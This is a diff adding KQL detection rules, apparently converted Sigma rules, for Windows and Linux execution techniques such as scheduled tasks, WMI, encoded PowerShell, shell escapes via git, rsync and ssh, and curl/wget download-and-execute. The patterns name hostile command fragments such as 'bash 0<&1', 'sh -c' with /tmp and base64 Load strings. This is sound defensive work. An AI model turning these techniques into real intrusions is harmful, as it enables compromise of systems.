newline at end of file diff --git a/KQL/rules/Execution/scheduled_task_creation_via_schtasks_exe.kql b/KQL/rules/Execution/scheduled_task_creation_via_schtasks_exe.kql new file mode 100644 index 00000000..49a6d73a --- /dev/null +++ b/KQL/rules/Execution/scheduled_task_creation_via_schtasks_exe.kql @@ -0,0 +1,13 @@ +// Title: Scheduled Task Creation Via Schtasks.EXE +// Author: Florian Roth (Nextron Systems) +// Date: 2019-01-16 +// Level: low +// Description: Detects the creation of scheduled tasks by user accounts via the "schtasks" utility. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.t1053.005, attack.s0111, car.2013-08-001, stp.1u +// False Positives: +// - Administrative activity +// - Software installation + +DeviceProcessEvents +| where (ProcessCommandLine contains " /create " and FolderPath endswith "\\schtasks.exe") and (not((AccountName contains "AUTHORI" or AccountName contains "AUTORI"))) and (not((ProcessCommandLine contains "Microsoft\\Office\\Office Performance Monitor" and (FolderPath in~ ("C:\\Windows\\System32\\schtasks.exe", "C:\\Windows\\SysWOW64\\schtasks.exe")) and (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe"))))) \ No newline at end of file diff --git a/KQL/rules/Execution/script_event_consumer_spawning_process.kql b/KQL/rules/Execution/script_event_consumer_spawning_process.kql new file mode 100644 index 00000000..ecf4fcf9 --- /dev/null +++ b/KQL/rules/Execution/script_event_consumer_spawning_process.kql @@ -0,0 +1,10 @@ +// Title: Script Event Consumer Spawning Process +// Author: Sittikorn S +// Date: 2021-06-21 +// Level: high +// Description: Detects a suspicious child process of Script Event Consumer (scrcons.exe). +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047 + +DeviceProcessEvents +| where (FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msbuild.exe") and InitiatingProcessFolderPath endswith "\\scrcons.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/script_interpreter_execution_from_suspicious_folder.kql b/KQL/rules/Execution/script_interpreter_execution_from_suspicious_folder.kql new file mode 100644 index 00000000..1c970738 --- /dev/null +++ b/KQL/rules/Execution/script_interpreter_execution_from_suspicious_folder.kql @@ -0,0 +1,10 @@ +// Title: Script Interpreter Execution From Suspicious Folder +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-02-08 +// Level: high +// Description: Detects a suspicious script execution in temporary folders or folders accessible by environment variables +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceProcessEvents +| where ((ProcessCommandLine contains " -ep bypass " or ProcessCommandLine contains " -ExecutionPolicy bypass " or ProcessCommandLine contains " -w hidden " or ProcessCommandLine contains "/e:javascript " or ProcessCommandLine contains "/e:Jscript " or ProcessCommandLine contains "/e:vbscript ") or (FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("cscript.exe", "mshta.exe", "wscript.exe"))) and ((ProcessCommandLine contains ":\\Perflogs\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp" or ProcessCommandLine contains "\\AppData\\Roaming\\Temp" or ProcessCommandLine contains "\\Temporary Internet" or ProcessCommandLine contains "\\Windows\\Temp") or ((ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favorites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favourites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Contacts\\"))) \ No newline at end of file diff --git a/KQL/rules/Execution/service_reconnaissance_via_wmic_exe.kql b/KQL/rules/Execution/service_reconnaissance_via_wmic_exe.kql new file mode 100644 index 00000000..7067667c --- /dev/null +++ b/KQL/rules/Execution/service_reconnaissance_via_wmic_exe.kql @@ -0,0 +1,14 @@ +// Title: Service Reconnaissance Via Wmic.EXE +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-14 +// Level: medium +// Description: An adversary might use WMI to check if a certain remote service is running on a remote device. +When the test completes, a service information will be displayed on the screen if it exists. +A common feedback message is that "No instance(s) Available" if the service queried is not running. +A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047 + +DeviceProcessEvents +| where ProcessCommandLine contains "service" and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/service_started_stopped_via_wmic_exe.kql b/KQL/rules/Execution/service_started_stopped_via_wmic_exe.kql new file mode 100644 index 00000000..0a722440 --- /dev/null +++ b/KQL/rules/Execution/service_started_stopped_via_wmic_exe.kql @@ -0,0 +1,10 @@ +// Title: Service Started/Stopped Via Wmic.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-20 +// Level: medium +// Description: Detects usage of wmic to start or stop a service +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "stopservice" or ProcessCommandLine contains "startservice") and (ProcessCommandLine contains " service " and ProcessCommandLine contains " call ")) and (ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/service_startuptype_change_via_powershell_set_service.kql b/KQL/rules/Execution/service_startuptype_change_via_powershell_set_service.kql new file mode 100644 index 00000000..978851f5 --- /dev/null +++ b/KQL/rules/Execution/service_startuptype_change_via_powershell_set_service.kql @@ -0,0 +1,12 @@ +// Title: Service StartupType Change Via PowerShell Set-Service +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-04 +// Level: medium +// Description: Detects the use of the PowerShell "Set-Service" cmdlet to change the startup type of a service to "disabled" or "manual" +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1562.001 +// False Positives: +// - False positives may occur with troubleshooting scripts + +DeviceProcessEvents +| where ((ProcessCommandLine contains "Disabled" or ProcessCommandLine contains "Manual") and (ProcessCommandLine contains "Set-Service" and ProcessCommandLine contains "-StartupType")) and (FolderPath endswith "\\powershell.exe" or ProcessVersionInfoOriginalFileName =~ "PowerShell.EXE") \ No newline at end of file diff --git a/KQL/rules/Execution/service_startuptype_change_via_sc_exe.kql b/KQL/rules/Execution/service_startuptype_change_via_sc_exe.kql new file mode 100644 index 00000000..d6155e69 --- /dev/null +++ b/KQL/rules/Execution/service_startuptype_change_via_sc_exe.kql @@ -0,0 +1,12 @@ +// Title: Service StartupType Change Via Sc.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-01 +// Level: medium +// Description: Detect the use of "sc.exe" to change the startup type of a service to "disabled" or "demand" +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1562.001 +// False Positives: +// - False positives may occur with troubleshooting scripts + +DeviceProcessEvents +| where ((ProcessCommandLine contains "disabled" or ProcessCommandLine contains "demand") and (ProcessCommandLine contains " config " and ProcessCommandLine contains "start")) and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/shell_execution_of_process_located_in_tmp_directory.kql b/KQL/rules/Execution/shell_execution_of_process_located_in_tmp_directory.kql new file mode 100644 index 00000000..cd79de2f --- /dev/null +++ b/KQL/rules/Execution/shell_execution_of_process_located_in_tmp_directory.kql @@ -0,0 +1,10 @@ +// Title: Shell Execution Of Process Located In Tmp Directory +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2023-06-02 +// Level: high +// Description: Detects execution of shells from a parent process located in a temporary (/tmp) directory +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents +| where (FolderPath endswith "/bash" or FolderPath endswith "/csh" or FolderPath endswith "/dash" or FolderPath endswith "/fish" or FolderPath endswith "/ksh" or FolderPath endswith "/sh" or FolderPath endswith "/zsh") and InitiatingProcessFolderPath startswith "/tmp/" \ No newline at end of file diff --git a/KQL/rules/Execution/shell_execution_via_git_linux.kql b/KQL/rules/Execution/shell_execution_via_git_linux.kql new file mode 100644 index 00000000..fb6507ce --- /dev/null +++ b/KQL/rules/Execution/shell_execution_via_git_linux.kql @@ -0,0 +1,11 @@ +// Title: Shell Execution via Git - Linux +// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.) +// Date: 2024-09-02 +// Level: high +// Description: Detects the use of the "git" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceProcessEvents +| where (ProcessCommandLine contains "bash 0<&1" or ProcessCommandLine contains "dash 0<&1" or ProcessCommandLine contains "sh 0<&1") and (InitiatingProcessCommandLine contains " -p " and InitiatingProcessCommandLine contains "help") and InitiatingProcessFolderPath endswith "/git" \ No newline at end of file diff --git a/KQL/rules/Execution/shell_execution_via_rsync_linux.kql b/KQL/rules/Execution/shell_execution_via_rsync_linux.kql new file mode 100644 index 00000000..2505dcd6 --- /dev/null +++ b/KQL/rules/Execution/shell_execution_via_rsync_linux.kql @@ -0,0 +1,13 @@ +// Title: Shell Execution via Rsync - Linux +// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.), Florian Roth +// Date: 2024-09-02 +// Level: high +// Description: Detects the use of the "rsync" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 +// False Positives: +// - Legitimate cases in which "rsync" is used to execute a shell + +DeviceProcessEvents +| where (ProcessCommandLine contains "/ash " or ProcessCommandLine contains "/bash " or ProcessCommandLine contains "/dash " or ProcessCommandLine contains "/csh " or ProcessCommandLine contains "/sh " or ProcessCommandLine contains "/zsh " or ProcessCommandLine contains "/tcsh " or ProcessCommandLine contains "/ksh " or ProcessCommandLine contains "'ash " or ProcessCommandLine contains "'bash " or ProcessCommandLine contains "'dash " or ProcessCommandLine contains "'csh " or ProcessCommandLine contains "'sh " or ProcessCommandLine contains "'zsh " or ProcessCommandLine contains "'tcsh " or ProcessCommandLine contains "'ksh ") and (ProcessCommandLine contains " -e " and (FolderPath endswith "/rsync" or FolderPath endswith "/rsyncd")) \ No newline at end of file diff --git a/KQL/rules/Execution/shell_invocation_via_env_command_linux.kql b/KQL/rules/Execution/shell_invocation_via_env_command_linux.kql new file mode 100644 index 00000000..6a45c72d --- /dev/null +++ b/KQL/rules/Execution/shell_invocation_via_env_command_linux.kql @@ -0,0 +1,13 @@ +// Title: Shell Invocation via Env Command - Linux +// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.) +// Date: 2024-09-02 +// Level: high +// Description: Detects the use of the env command to invoke a shell. This may indicate an attempt to bypass restricted environments, escalate privileges, or execute arbitrary commands. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 +// False Positives: +// - Github operations such as ghe-backup + +DeviceProcessEvents +| where (ProcessCommandLine endswith "/bin/bash" or ProcessCommandLine endswith "/bin/dash" or ProcessCommandLine endswith "/bin/fish" or ProcessCommandLine endswith "/bin/sh" or ProcessCommandLine endswith "/bin/zsh") and FolderPath endswith "/env" \ No newline at end of file diff --git a/KQL/rules/Execution/shell_invocation_via_ssh_linux.kql b/KQL/rules/Execution/shell_invocation_via_ssh_linux.kql new file mode 100644 index 00000000..3a434d12 --- /dev/null +++ b/KQL/rules/Execution/shell_invocation_via_ssh_linux.kql @@ -0,0 +1,11 @@ +// Title: Shell Invocation Via Ssh - Linux +// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.) +// Date: 2024-08-29 +// Level: high +// Description: Detects the use of the "ssh" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceProcessEvents +| where (ProcessCommandLine contains "/bin/bash" or ProcessCommandLine contains "/bin/dash" or ProcessCommandLine contains "/bin/fish" or ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "/bin/zsh" or ProcessCommandLine contains "sh 0<&2 1>&2" or ProcessCommandLine contains "sh 1>&2 0<&2") and ((ProcessCommandLine contains "ProxyCommand=;" or ProcessCommandLine contains "permitlocalcommand=yes" or ProcessCommandLine contains "localhost") and FolderPath endswith "/ssh") \ No newline at end of file diff --git a/KQL/rules/Execution/silenttrinity_stager_msbuild_activity.kql b/KQL/rules/Execution/silenttrinity_stager_msbuild_activity.kql new file mode 100644 index 00000000..0e7beea9 --- /dev/null +++ b/KQL/rules/Execution/silenttrinity_stager_msbuild_activity.kql @@ -0,0 +1,10 @@ +// Title: Silenttrinity Stager Msbuild Activity +// Author: Kiran kumar s, oscd.community +// Date: 2020-10-11 +// Level: high +// Description: Detects a possible remote connections to Silenttrinity c2 +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1127.001 + +DeviceNetworkEvents +| where InitiatingProcessFolderPath endswith "\\msbuild.exe" and (RemotePort in~ ("80", "443")) \ No newline at end of file diff --git a/KQL/rules/Execution/sql_client_tools_powershell_session_detection.kql b/KQL/rules/Execution/sql_client_tools_powershell_session_detection.kql new file mode 100644 index 00000000..3cab475f --- /dev/null +++ b/KQL/rules/Execution/sql_client_tools_powershell_session_detection.kql @@ -0,0 +1,14 @@ +// Title: SQL Client Tools PowerShell Session Detection +// Author: Agro (@agro_sev) oscd.communitly +// Date: 2020-10-13 +// Level: medium +// Description: This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio. +Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1127 +// False Positives: +// - Direct PS command execution through SQLToolsPS.exe is uncommon, childprocess sqltoolsps.exe spawned by smss.exe is a legitimate action. + +DeviceProcessEvents +| where (FolderPath endswith "\\sqltoolsps.exe" or InitiatingProcessFolderPath endswith "\\sqltoolsps.exe" or ProcessVersionInfoOriginalFileName =~ "\\sqltoolsps.exe") and (not(InitiatingProcessFolderPath endswith "\\smss.exe")) \ No newline at end of file diff --git a/KQL/rules/Execution/start_windows_service_via_net_exe.kql b/KQL/rules/Execution/start_windows_service_via_net_exe.kql new file mode 100644 index 00000000..cd8eafac --- /dev/null +++ b/KQL/rules/Execution/start_windows_service_via_net_exe.kql @@ -0,0 +1,12 @@ +// Title: Start Windows Service Via Net.EXE +// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community +// Date: 2019-10-21 +// Level: low +// Description: Detects the usage of the "net.exe" command to start a service using the "start" flag +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1569.002 +// False Positives: +// - Legitimate administrator or user executes a service for legitimate reasons. + +DeviceProcessEvents +| where ProcessCommandLine contains " start " and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) \ No newline at end of file diff --git a/KQL/rules/Execution/successful_account_login_via_wmi.kql b/KQL/rules/Execution/successful_account_login_via_wmi.kql new file mode 100644 index 00000000..e1d4a6ee --- /dev/null +++ b/KQL/rules/Execution/successful_account_login_via_wmi.kql @@ -0,0 +1,13 @@ +// Title: Successful Account Login Via WMI +// Author: Thomas Patzke +// Date: 2019-12-04 +// Level: low +// Description: Detects successful logon attempts performed with WMI +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047 +// False Positives: +// - Monitoring tools +// - Legitimate system administration + +DeviceLogonEvents +| where InitiatingProcessFolderPath endswith "\\WmiPrvSE.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_binaries_and_scripts_in_public_folder.kql b/KQL/rules/Execution/suspicious_binaries_and_scripts_in_public_folder.kql new file mode 100644 index 00000000..dea171ba --- /dev/null +++ b/KQL/rules/Execution/suspicious_binaries_and_scripts_in_public_folder.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Binaries and Scripts in Public Folder +// Author: The DFIR Report +// Date: 2025-01-23 +// Level: high +// Description: Detects the creation of a file with a suspicious extension in the public folder, which could indicate potential malicious activity. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204 +// False Positives: +// - Administrators deploying legitimate binaries to public folders. + +DeviceFileEvents +| where FolderPath contains ":\\Users\\Public\\" and (FolderPath endswith ".bat" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".js" or FolderPath endswith ".ps1" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs") \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_binary_in_user_directory_spawned_from_office_application.kql b/KQL/rules/Execution/suspicious_binary_in_user_directory_spawned_from_office_application.kql new file mode 100644 index 00000000..453e0bf3 --- /dev/null +++ b/KQL/rules/Execution/suspicious_binary_in_user_directory_spawned_from_office_application.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Binary In User Directory Spawned From Office Application +// Author: Jason Lynch +// Date: 2019-04-02 +// Level: high +// Description: Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio) +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.002, attack.g0046, car.2013-05-002 + +DeviceProcessEvents +| where (FolderPath endswith ".exe" and FolderPath startswith "C:\\users\\" and (InitiatingProcessFolderPath endswith "\\WINWORD.EXE" or InitiatingProcessFolderPath endswith "\\EXCEL.EXE" or InitiatingProcessFolderPath endswith "\\POWERPNT.exe" or InitiatingProcessFolderPath endswith "\\MSPUB.exe" or InitiatingProcessFolderPath endswith "\\VISIO.exe" or InitiatingProcessFolderPath endswith "\\MSACCESS.exe" or InitiatingProcessFolderPath endswith "\\EQNEDT32.exe")) and (not(FolderPath endswith "\\Teams.exe")) \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_child_process_of_bginfo_exe.kql b/KQL/rules/Execution/suspicious_child_process_of_bginfo_exe.kql new file mode 100644 index 00000000..8a34bb30 --- /dev/null +++ b/KQL/rules/Execution/suspicious_child_process_of_bginfo_exe.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Child Process Of BgInfo.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-16 +// Level: high +// Description: Detects suspicious child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.005, attack.defense-evasion, attack.t1218, attack.t1202 + +DeviceProcessEvents +| where ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains "\\AppData\\Local\\" or FolderPath contains "\\AppData\\Roaming\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains ":\\PerfLogs\\")) and (InitiatingProcessFolderPath endswith "\\bginfo.exe" or InitiatingProcessFolderPath endswith "\\bginfo64.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_deno_file_written_from_remote_source.kql b/KQL/rules/Execution/suspicious_deno_file_written_from_remote_source.kql new file mode 100644 index 00000000..92c83621 --- /dev/null +++ b/KQL/rules/Execution/suspicious_deno_file_written_from_remote_source.kql @@ -0,0 +1,14 @@ +// Title: Suspicious Deno File Written from Remote Source +// Author: Josh Nickels, Michael Taggart +// Date: 2025-05-22 +// Level: low +// Description: Detects Deno writing a file from a direct HTTP(s) call and writing to the appdata folder or bringing it's own malicious DLL. +This behavior may indicate an attempt to execute remotely hosted, potentially malicious files through deno. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204, attack.t1059.007, attack.command-and-control, attack.t1105 +// False Positives: +// - Legitimate usage of deno to request a file or bring a DLL to a host + +DeviceFileEvents +| where (FolderPath contains "\\deno\\gen\\" or FolderPath contains "\\deno\\remote\\https\\") and (FolderPath contains ":\\Users\\" and FolderPath contains "\\AppData\\") \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_download_and_execute_pattern_via_curl_wget.kql b/KQL/rules/Execution/suspicious_download_and_execute_pattern_via_curl_wget.kql new file mode 100644 index 00000000..2d79b7c4 --- /dev/null +++ b/KQL/rules/Execution/suspicious_download_and_execute_pattern_via_curl_wget.kql @@ -0,0 +1,17 @@ +// Title: Suspicious Download and Execute Pattern via Curl/Wget +// Author: Aayush Gupta +// Date: 2025-06-17 +// Level: high +// Description: Detects suspicious use of command-line tools such as curl or wget to download remote +content - particularly scripts - into temporary directories (e.g., /dev/shm, /tmp), followed by +immediate execution, indicating potential malicious activity. This pattern is commonly used +by malicious scripts, stagers, or downloaders in fileless or multi-stage Linux attacks. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.004, attack.t1203 +// False Positives: +// - System update scripts using temporary files +// - Installer scripts or automated provisioning tools + +DeviceProcessEvents +| where (ProcessCommandLine contains "/curl" or ProcessCommandLine contains "/wget") and ProcessCommandLine contains "sh -c" and (ProcessCommandLine contains "/tmp/" or ProcessCommandLine contains "/dev/shm/") \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_electron_application_child_processes.kql b/KQL/rules/Execution/suspicious_electron_application_child_processes.kql new file mode 100644 index 00000000..ef5c9fd1 --- /dev/null +++ b/KQL/rules/Execution/suspicious_electron_application_child_processes.kql @@ -0,0 +1,11 @@ +// Title: Suspicious Electron Application Child Processes +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-21 +// Level: medium +// Description: Detects suspicious child processes of electron apps (teams, discord, slack, etc.). This could be a potential sign of ".asar" file tampering (See reference section for more information) or binary execution proxy through specific CLI arguments (see related rule) + +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents +| where (InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\discord.exe" or InitiatingProcessFolderPath endswith "\\GitHubDesktop.exe" or InitiatingProcessFolderPath endswith "\\keybase.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe" or InitiatingProcessFolderPath endswith "\\msteams.exe" or InitiatingProcessFolderPath endswith "\\slack.exe" or InitiatingProcessFolderPath endswith "\\teams.exe") and ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains ":\\ProgramData\\" or FolderPath contains ":\\Temp\\" or FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\Windows\\Temp\\")) and (not((ProcessCommandLine contains "\\NVSMI\\nvidia-smi.exe" and FolderPath endswith "\\cmd.exe" and InitiatingProcessFolderPath endswith "\\Discord.exe"))) \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_encoded_and_obfuscated_reflection_assembly_load_function_call.kql b/KQL/rules/Execution/suspicious_encoded_and_obfuscated_reflection_assembly_load_function_call.kql new file mode 100644 index 00000000..f2ef91d2 --- /dev/null +++ b/KQL/rules/Execution/suspicious_encoded_and_obfuscated_reflection_assembly_load_function_call.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call +// Author: pH-T (Nextron Systems) +// Date: 2022-03-01 +// Level: high +// Description: Detects suspicious base64 encoded and obfuscated "LOAD" keyword used in .NET "reflection.assembly" +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1059.001, attack.t1027 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains "OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ" or ProcessCommandLine contains "oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA" or ProcessCommandLine contains "6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA" or ProcessCommandLine contains "OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ" or ProcessCommandLine contains "oAOgAoACIATABvACIAKwAiAGEAZAAiACkA" or ProcessCommandLine contains "6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA" or ProcessCommandLine contains "OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ" or ProcessCommandLine contains "oAOgAoACIATABvAGEAIgArACIAZAAiACkA" or ProcessCommandLine contains "6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA" or ProcessCommandLine contains "OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ" or ProcessCommandLine contains "oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA" or ProcessCommandLine contains "6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA" or ProcessCommandLine contains "OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ" or ProcessCommandLine contains "oAOgAoACcATABvACcAKwAnAGEAZAAnACkA" or ProcessCommandLine contains "6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA" or ProcessCommandLine contains "OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ" or ProcessCommandLine contains "oAOgAoACcATABvAGEAJwArACcAZAAnACkA" or ProcessCommandLine contains "6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA" \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_encoded_powershell_command_line.kql b/KQL/rules/Execution/suspicious_encoded_powershell_command_line.kql new file mode 100644 index 00000000..46581024 --- /dev/null +++ b/KQL/rules/Execution/suspicious_encoded_powershell_command_line.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Encoded PowerShell Command Line +// Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community +// Date: 2018-09-03 +// Level: high +// Description: Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet) +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 + +DeviceProcessEvents +| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (((ProcessCommandLine contains " JAB" or ProcessCommandLine contains " SUVYI" or ProcessCommandLine contains " SQBFAFgA" or ProcessCommandLine contains " aQBlAHgA" or ProcessCommandLine contains " aWV4I" or ProcessCommandLine contains " IAA" or ProcessCommandLine contains " IAB" or ProcessCommandLine contains " UwB" or ProcessCommandLine contains " cwB") and ProcessCommandLine contains " -e") or (ProcessCommandLine contains ".exe -ENCOD " or ProcessCommandLine contains " BA^J e-")) and (not(ProcessCommandLine contains " -ExecutionPolicy remotesigned ")) \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_execution_location_of_wermgr_exe.kql b/KQL/rules/Execution/suspicious_execution_location_of_wermgr_exe.kql new file mode 100644 index 00000000..1fe5f0c2 --- /dev/null +++ b/KQL/rules/Execution/suspicious_execution_location_of_wermgr_exe.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Execution Location Of Wermgr.EXE +// Author: Florian Roth (Nextron Systems) +// Date: 2022-10-14 +// Level: high +// Description: Detects suspicious Windows Error Reporting manager (wermgr.exe) execution location. +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents +| where FolderPath endswith "\\wermgr.exe" and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_execution_of_powershell_with_base64.kql b/KQL/rules/Execution/suspicious_execution_of_powershell_with_base64.kql new file mode 100644 index 00000000..e1d5ccdf --- /dev/null +++ b/KQL/rules/Execution/suspicious_execution_of_powershell_with_base64.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Execution of Powershell with Base64 +// Author: frack113 +// Date: 2022-01-02 +// Level: medium +// Description: Commandline to launch powershell with a base64 payload +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 + +DeviceProcessEvents +| where ((ProcessCommandLine contains " -e " or ProcessCommandLine contains " -en " or ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -enco" or ProcessCommandLine contains " -ec ") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) and (not(((InitiatingProcessFolderPath contains "C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or InitiatingProcessFolderPath contains "\\gc_worker.exe") or ProcessCommandLine contains " -Encoding "))) \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_explorer_process_with_whitespace_padding_clickfix_filefix.kql b/KQL/rules/Execution/suspicious_explorer_process_with_whitespace_padding_clickfix_filefix.kql new 